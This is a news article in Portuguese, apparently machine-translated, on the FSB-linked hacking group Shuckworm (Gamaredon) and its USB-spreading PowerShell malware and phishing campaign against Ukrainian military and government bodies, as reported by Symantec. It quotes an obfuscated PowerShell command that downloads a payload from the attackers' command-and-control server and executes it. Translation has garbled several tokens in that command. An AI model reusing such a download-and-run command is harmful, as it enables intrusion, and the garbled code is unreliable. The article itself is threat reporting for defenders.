.
Getty Images
Hackers que trabalham para o Serviço Federal de Segurança da Rússia montaram vários ataques cibernéticos que usaram malware baseado em USB para roubar grandes quantidades de dados de alvos ucranianos para uso em sua invasão contínua de seu vizinho menor, disseram pesquisadores.
“Os setores e a natureza das organizações e máquinas visadas podem ter dado aos invasores acesso a quantidades significativas de informações confidenciais”, escreveram pesquisadores da Symantec, agora propriedade da Broadcom, em um post na quinta-feira. “Houve indícios em algumas organizações de que os invasores estavam nas máquinas dos departamentos de recursos humanos das organizações, indicando que as informações sobre indivíduos que trabalham nas várias organizações eram uma prioridade para os invasores, entre outras coisas.”
O grupo, que a Symantec rastreia como Shuckworm e outros pesquisadores chamam de Gamaredon e Armageddon, está ativo desde 2014 e está vinculado ao FSB da Rússia, o principal serviço de segurança naquele país. O grupo se concentra exclusivamente na obtenção de informações sobre alvos ucranianos. Em 2020, pesquisadores da empresa de segurança SentinelOne disseram que o grupo de hackers “atacou mais de 5.000 entidades individuais em toda a Ucrânia, com foco particular em áreas onde as tropas ucranianas estão posicionadas”.
Em fevereiro, Shuckworm começou a implantar um novo malware e infraestrutura de comando e controle que penetrou com sucesso nas defesas de várias organizações ucranianas nas forças armadas, serviços de segurança e governo daquele país. Os membros do grupo parecem mais interessados em obter informações relacionadas a informações militares confidenciais que podem ser abusadas na invasão em curso da Rússia.
Esta campanha mais recente estreou um novo malware na forma de um script do PowerShell que espalha o Pterodo, um backdoor criado pelo Shuckworm. O script é ativado quando as unidades USB infectadas são conectadas aos computadores de destino. O script malicioso primeiro se copia na máquina de destino para criar um arquivo de atalho com a extensão rtf.lnk. Os arquivos têm nomes como video_porn.rtf.lnk, do_not_delete.rtf.lnk e Evidence.rtf.lnk. Os nomes, que estão principalmente no idioma ucraniano, são uma tentativa de atrair os alvos a abrir os arquivos para que instalem o Pterodo nas máquinas.
O script enumera todas as unidades conectadas ao computador de destino e se copia para todas as unidades removíveis anexadas, provavelmente na esperança de infectar quaisquer dispositivos com air-gap, que intencionalmente não estão conectados à Internet em uma tentativa de impedir que eles sendo hackeado.
Para cobrir seus rastros, o Shuckworm criou dezenas de variantes e alternou rapidamente os endereços IP e a infraestrutura que usa para comando e controle. O grupo também usa serviços legítimos como o Telegram e sua plataforma de microblogging Telegraph para comando e controle em outra tentativa de evitar a detecção.
O Shuckworm normalmente usa e-mails de phishing como um vetor inicial nos computadores dos alvos. Os e-mails contêm anexos maliciosos que se disfarçam como arquivos com extensões, incluindo .docx, .rar, .sfx, lnk e hta. Os e-mails costumam usar tópicos como conflitos armados, processos criminais, combate ao crime e proteção de crianças como iscas para fazer com que os alvos abram os e-mails e cliquem nos anexos.
Os pesquisadores da Symantec disseram que um computador infectado que eles recuperaram na campanha era típico de como funciona. Eles escreveram:
Em uma vítima, o primeiro sinal de atividade maliciosa foi quando o usuário pareceu abrir um arquivo RAR que provavelmente foi enviado por e-mail de spear phishing e que continha um documento malicioso.
Depois que o documento foi aberto, um comando malicioso do PowerShell foi executado para baixar a carga útil do próximo estágio do servidor C&C dos invasores:
“CSIDL_SYSTEMcmd.exe” /c start /min “” powershell -w oculto
“$gt=”/obter.”+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+4
8);[system.net.servicepointmanager]::servercertificatevalidationcallb
ack={$true};$hosta+=’.vafikgo.’;$hosta+=[char](57+57);$hosta+=[char](
60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.ad
lista de vestidos[0];$client=(novo-objeto
net.webclient);$faddr=”htt”+’ps://’+$addr+$gt;$text=$client.downloads
tring($faddr);iex $texto”Mais recentemente, a Symantec observou o Shuckworm aproveitando mais endereços IP em seus scripts do PowerShell. Esta é provavelmente uma tentativa de fugir de alguns métodos de rastreamento empregados pelos pesquisadores.
O Shuckworm também continua atualizando as técnicas de ofuscação usadas em seus scripts do PowerShell na tentativa de evitar a detecção, com até 25 novas variantes dos scripts do grupo observadas por mês entre janeiro e abril de 2023.
A postagem de quinta-feira inclui endereços IP, hashes, nomes de arquivos e outros indicadores de comprometimento que as pessoas podem usar para detectar se foram alvos. A postagem também alerta que o grupo representa uma ameaça que os alvos devem levar a sério.
“Essa atividade demonstra que o foco incansável de Shuckworm na Ucrânia continua”, escreveram eles. “Parece claro que os grupos de ataque apoiados pelo estado-nação russo continuam atacando alvos ucranianos na tentativa de encontrar dados que possam potencialmente ajudar suas operações militares”.
.
